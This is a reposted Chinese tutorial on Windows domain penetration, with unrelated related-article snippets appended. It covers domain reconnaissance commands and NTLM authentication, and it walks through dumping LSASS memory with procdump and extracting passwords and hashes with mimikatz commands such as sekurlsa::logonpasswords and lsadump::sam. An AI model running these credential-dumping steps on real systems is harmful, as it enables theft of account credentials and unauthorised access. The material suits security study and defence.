域渗透(1)

news2024/12/24 3:05:11

域基础信息搜集

ping 域名
	
ipconfig /all  判断当前是否在域环境中,看dns后缀和dns服务器
	
net view  查看本工作组/域环境中的设备
		关闭防火墙
		开启服务
	
net view  /domain     查询域数量
	
net view | net view /domain:域名   查询主机数量
	
net group /domain  域控组别信息 
	
net group  "domain admins" /domain  查看域控管理员组的成员
		域内高权限组
			Domain Admins	域控管理员组(高权限)
			Domain Computers 加入域内的主机成员
			Domain Controllers 域控(高权限)
			Domain Users	域内普通用户
			Enterprise Admins	企业管理员(高权限)
	
net time /domain   查看系统时间
	
systeminfo | findstr  “KB”   查看补丁信息
	
SID
	sid: whoami /user   查看SID
		500:administrator
		​	501:guest
		​	1000+:普通用户
#SID也就是安全标识符(Security Identifiers),是标识用户、组和计算机帐户的唯一的号码。在第一次创建该帐户时,将给网络上的每一个帐户发布一个唯一的 SID。Windows 2000 中的内部进程将引用帐户的 SID 而不是帐户的用户或组名。如果创建帐户,再删除帐户,然后使用相同的用户名创建另一个帐户,则新帐户将不具有授权给前一个帐户的权力或权限,原因是该帐户具有不同的 SID 号。安全标识符也被称为安全 ID 或 SID。 
#S-1-5-21-15631306-761508637-3840666680-500
#s dai表sid
#1 代表当前sid版本
#5 固定的
#21 在主机中基本都是21
#在同一个域捏,中间的三个长长的部分是一样的

windows本地认证

SAM文件路径

C:\Windows\System32\config/SAM

 winlogin和lsass概念

        当我们登录系统(winlogin.exe)的时候,系统会自动读取SAM文件中的“密码”与我们输入(lsass.exe对输入的内容进行比对)的“密码”进行比对 ,如果相同,证明认证成功!!!---SAM文件不能被取走(你拷贝的时候就是会提醒你文件正在使用中)。

        windows除了输入的时候密码是明文的,其他的是时候都是以密文的形式存在。进行比对的是时候也是先将其转化成NTLM hash值,在与sam数据库进行比对认证。

        Windows Loqon Process(即winlogon.exe),是Windows NT用户登陆程序,用于管理用户登录和退出。LSASS用于微软Windows系统的安全机制。它用于本地安全和登陆策略。

NTLM

        NTLM Hash是支持Net NTLM认证协议及本地认证过程中的一个重要参与物,其长度为32位,由数字与字母组成。

        Windows本身不存储用户的明文密码,它会将用户的明文密码经过加密算法后存储在SAM数据库中。
        当用户登录时,将用户输入的明文密码也加密成NTLM Hash,与SAM数据库中的NTLM Hash进行比较。NTLM Hash的前身是LMHash,目前基本淘汰,但是还是存在。XP和2003。

转换实例admin=》209c6174da490caeb422f3fa5a7ae634
            admin -> hex(16进制编码)=61646d696e
            61646d696e -> Unicode => 610064006d0069006eO0
            610064006d0069006e00 ->MD4=>209c6174da490caeb422f3fa5a7ae634

 LM Hash
    在NTLM协议问世之前,它的前身就是LM(LAN Manager)协议。
    LM Hash是 AAD3B435B51404EEAAD3B435B51404EE 这表示空密码或者是未使用LM_HASH

windows下的HASH密码格式
    用户名称:SID:LM-HASH值:NTLM-HASH
    例:Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
    Hash一般存储在两个地方:

        ①SAM文件,存储在本机 对应本地用户

        ②NTDS.DIT文件,存储在域控上 对应域用户

windows网络认证

        工作组环境:在内网渗透中,经常遇到工作组环境,而工作组环境是一个逻辑上的网络环境(工作区),隶属于工作组的机器之间无法互相建立一个完美的信任机制,只能点对点,是比较落后的认证方式,没有信托机构。假设A主机与B主机属于同一个工作组环境,A想访问B主机上的资料,需要将一个存在于B主机上的账户凭证发送至B主机,经过认证才能够访问B主机.上的资源。(常见服务,SMB-445)

        早期SMB协议在网络上传输明文口令。后来出现LAN Manager  ChallengelResponse 验证机制,简称LM。但是容易被破解。因此微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。

NTLM

协商
        主要用于确认双方协议版本(NTLM v1/NTLM V2),windows7以上停用版本v1
质询
        就是挑战(Challenge)/响应(Response)认证机制起作用的范畴
验证
        验证主要是在质询完成后,验证结果,是认证的最后一步

        Challenge1和Response的表现形式都是Net-NTLM Hash

        NTLM Hash 全程不会发送,只参与加密(Why):保护NTLM Hash不外泄

理解:

        当自己的主机去向服务器发送一个用户名请求的时候,服务器会查看你自己的本地账户列表是否有这个用户名,有的话就生成一个16位的随机数位challenge(挑战)。然后用challenge对NTLM-hash值(加密的密码)进行加密,生成一个challenge1存在内存当中,并把challenge发给我们的主机。主机收到之后,也用challenge对NTLM-hash进行加密,生成一个Response并且发送给服务器。然后服务器就会把challenge1和Response进行比较。一样的话就是认证通过。

NTLM v1 与 NTLM v2
        Challage: NTLM v1的Challenge有8位,NTLM v2的Challenge为16位。
        Net-NTLM Hash: NTLM v1的主要加密算法是DES,NTLM v2的主要加密算法是HMAC-MD5。
        NTLM v1与NTLM v2最显著的区别就是Challenge与加密算法不同,共同点就是加密的原料都是NTLM Hash。

        NTLM v1 的加密方式为DES , NTLM v2的加密方式为HMAC-MD5

Procdump

简介

        Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中。

关于Procdump和mimikatz的使用思路:

       windows密码导出分为两种方式,一种是在内存中读取,还有一种是读取sam文件。Procdump用的是内存中读取的方式,导出一个后缀名为.dmp的文件,然后放到mimikatz中进行读取

下载地址

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

 操作

参数
	-ma   写一个完整的转储文件。包括所有的内存信息。
	-accepteula   自动接收内部授权协议
	-h  帮助手册

cd C:\Users\Administrator\Desktop\Procdump
#先进入到该文件夹中

procdump64.exe  -accepteula -ma lsass.exe lsass.dmp 
#把内存当中的HASH导入到本地,并命名为lsass.dmp

要以管理员的身份运行,不然会报错

Mimikatz

下载地址

https://github.com/ParrotSec/mimikatz

常用命令

mimikatz# ::    查看帮助手册
	
mimikatz# log  记录所得到的信息
	
mimikatz# hostname 查看主机名
	
privilege::debug 提升到特权
	
mimikatz#sekurlsa::msv #读取内存的HASH智
	
mimikatz# sekurlsa::minidump lsass.dmp   切换环境
	
mimikatz# sekurlsa::logonpasswords    列出所有可用的凭据
	
kerberos::list #列出票据
	
kerberos::purge #清除票据
	
lsadump::sam 查看sam文件内容获取用户名和NTLM hash
	
lsadump::secrets 获取当前用户密码
	
sekurlsa::logonpasswords 获取所有账户密码(比procdump的使用更简单)
	
sekurlsa::kerberos 获取kerberos认证信息(账户密码等),域内
	
process::start command 启动进程
	
process::stop command 结束进程
	
process::list 列出进程

读取sam文件密码

方法一:利用procdump导下来的dump文件

mimikatz# ::    查看帮助手册
	
mimikatz# log  记录所得到的信息
#Using 'mimikatz.log' for logfile : OK 表示使用成功,可以看到在文件夹中多了一个mimikatz.log文件。等下在mimikatz中的所有操作都会被记录在这个文件中
#log文件时一次性的,你下次要是还想用log进行读取就还得开启他的这个功能
	
mimikatz# sekurlsa::minidump lsass.dmp   切换环境
	
mimikatz# sekurlsa::logonpasswords    列出所有可用的凭据

方法二: 直接利用minikatz(需要管理权限)

mimikata# log  记录所得到的信息
	
mimikatz # privilege::debug   //提权
	
mimikatz # sekurlsa::msv   //提取内存的HASH值
	
mimikatz# sekurlsa::logonpasswords    列出所有可用的凭据

报错

        1.读取不了win11的密码,导出来后读取就报错,不是权限的问题。尝试过好几个新版本的也不行,两个方法都读取不了win11。

        2.读取win10的时候密码是空的,在 windows 10 / 2012r2 之后的系统版本中已禁⽤在内存缓存中存系统⽤户明⽂密码

       

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/695214.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用el-tree实现不同区域的拖拽功能时遇到的坑点

问题再现 利用el-tree实现在两个区域的拖拽,1.树上的拖拽排序,2.将树上节点拖拽到画布上。 在将节点拖拽到画布上的时候,只要在树上移动过,松开鼠标的时候,树上的拖拽排序功能也生效了,那么如何使这两个拖…

蓝海卓越计费管理系统 download.php 任意文件读取漏洞

0x01、漏洞描述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件 0x02、漏洞影响 蓝海卓越计费管理系统 0x03、fofa title“蓝海卓越计费管理系统” 0x04、漏洞复现 登录页面如下&#xff1a…

shell中快速遍历文件下指定的内容

1.举例 遍历当前目录下所有Makefile文件,找到内容适配CONFIG_SMP的所有Makefile find -type f -name Makefile | xargs grep "CONFIG_SMP" 2.find命令 3.xargs命令 3.1. 命令由来 xargs (英文全拼: eXtended ARGuments&#xff…

关于Idea中springboot热部署,html,js保存不起作用

a、引入依赖&#xff1a; <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-devtools</artifactId> <optional>true</optional> </depe…

浅谈智能还书车

智能还书车是一种新型的智能化设备&#xff0c;配备触摸显示屏或简单操作的人机交流界面、图形界面&#xff0c;通过协议或其他网络及专用接口与图书馆自动化系统数据相连接&#xff0c;由读者自行对图书进行快速归还&#xff0c;读者把图书放到书车上&#xff0c;系统自动对图…

2. 线性模型

b站刘二老师pytorch深度学习课程&#xff1a;https://www.bilibili.com/video/BV1Y7411d7Ys?p2&vd_sourceb17f113d28933824d753a0915d5e3a90 如果每周学习4个小时&#xff0c;那能够获得什么成绩&#xff1f; y已知的是采样得到的数据&#xff0c;属于训练集&#xff08;t…

使用 css 禁用 input 控件实现 disable 效果

文章目录 需求分析代码 需求 使用 css 禁用 input 控件实现 disable 效果 分析 在 js 中&#xff0c;我们使用以下方法来阻止input,select,checkbox的默认事件&#xff0c;如 javascript event.preventDefault() event.stopPropagation()但在 css 中&#xff0c;我们可以设置对…

Android App的几个核心概念

Application启动 点击桌面图标启动App(如下流程图) 针对以上流程图示&#xff1a; ActivityManagerService#startProcessLocked()Process#start()ActivityThread#main()&#xff0c;入口分析的地方ActivityThread#attach()&#xff0c;这个里面的逻辑很核心 ActivityManagerS…

20230621 taro+vue3+webpack5+antdv时,在vue文件中特定组件时,devH5环境报错

问题 在某个vue文件下 import { notification } from ant-design-vue;然后在终端开始 yarn dev:h5在浏览器看效果 回出现以下错误 Uncaught (in promise) TypeError: __webpack_require__.hmd is not a functionat ./node_modules/.taro/h5/prebundle/ant-design-vue.js原因…

提高客户体验:智能客服外包服务的优势

随着科技的发展&#xff0c;智能客服外包服务越来越受到企业的青睐。这种服务能够帮助企业提高客户体验&#xff0c;减少客服成本&#xff0c;提高工作效率。本文将从技术、用户体验等方面阐述智能客服外包服务的优势。 人工智能技术 智能客服外包服务采用了一系列的技术手段&…

自然语言处理库NLTK的初步环境配置和使用例子

NLTK的基本介绍见此&#xff0c; 了解自然语言处理_bcbobo21cn的博客-CSDN博客 先安装python&#xff1b;然后用pip命令安装nltk&#xff1b; 然后进入python&#xff0c;下载nltk的数据包&#xff1b;输入下图语句&#xff0c;弹出一个框&#xff0c; 一般选择 all&#xff…

PHP 实验室设备系统mysql数据库web结构apache计算机软件工程网页wamp

一、源码特点 PHP 实验室设备系统 是一套完善的web设计系统&#xff0c;对理解php编程开发语言有帮助&#xff0c;系统具有完整的源代码和数据库&#xff0c;系统主要采用B/S模式开发。 代码下载 https://download.csdn.net/download/qq_41221322/87959348https://downlo…

Kaggle 数据竞赛 | ICR - 鉴定与年龄相关的疾病

文章目录 一、前言二、主要内容1. 评估2. 时间线3. 奖金4. 代码要求 三、总结 &#x1f349; CSDN 叶庭云&#xff1a;https://yetingyun.blog.csdn.net/ 一、前言 使用机器学习技术&#xff0c;通过匿名健康特征的测量数据来检测疾病。 比赛目标 本次比赛的目标是预测一个人是…

华为云Classroom一站式教学实践平台,开启云端教学新征程

随着高考落下帷幕&#xff0c;各高校将迎来新一届大学新生入学&#xff0c;他们的学长学姐们经过四年的学习&#xff0c;也即将步入社会&#xff0c;迈向一段新的人生旅程。 在这里小智先祝大家未来一切顺意&#xff0c;不忘初心&#xff0c;大鹏一日同风起&#xff0c;扶摇直…

win10环境下php安装thinkPHP5的曲线方式

win10环境下php安装thinkPHP5的曲线方式 强调一下在win10环境安装thinkPHP5需要使用Composer。 首先是thinkphp的教程&#xff1a;https://www.kancloud.cn/manual/thinkphp5/118006 你就会发现很坑逼 安装Composer的时候一种报错&#xff0c;就是php.ini文件错误。网上说什么…

Unity内置渲染管线升级URP教程

简介 URP全称为Universal Render Pipeline(通用渲染管线)&#xff0c;可以提供更加灵活的渲染方案&#xff0c;通过添加Render Feature实现各种渲染效果。并且可以针对移动平台进行专门的优化&#xff0c;同时还提供了SRPBatcher提高渲染效率。Unity的一些工具&#xff0c;比如…

客户关系管理系统有哪些?5款客户关系管理软件评测

客户关系管理系统是一种企业与客户之间的交互平台&#xff0c;它将客户的需求、市场环境、企业的发展战略等融入到整个业务流程中&#xff0c;在企业和客户之间建立起一个共享的资源库&#xff0c;使企业对客户的了解更深更全面&#xff0c;进而实现与客户的深入互动&#xff0…

C#创建窗体应用程序

1、新建项目&#xff0c;选择窗体应用 2、打开相关视图 工具箱&#xff1a;将工具箱中的控件直接拖拽到界面中&#xff0c;会自动生成对用的控件。 属性&#xff1a;可以设置控件的相关属性&#xff0c;包括事件&#xff0c;双击 3、设计应用界面 4、新建一个交互窗口 5、在登…

MVP(Multi-view Prompting):多视图提示改进了方面情感元组预测

论文题目&#xff08;Title&#xff09;&#xff1a;MVP: Multi-view Prompting Improves Aspect Sentiment Tuple Prediction 研究问题&#xff08;Question&#xff09;&#xff1a;多视图提示对方面情感元组检测的影响 研究动机&#xff08;Motivation&#xff09;&#x…

AI智能人脸识别,抠图-应用证件照

效果展示&#xff1a; 关键代码&#xff1a; import numpy as np import cv2 import osdef crop_face(source_image_path, output_folder_path, tag_width, tag_height):face_detector cv2.CascadeClassifier(cv2.data.haarcascades haarcascade_frontalface_default.xm…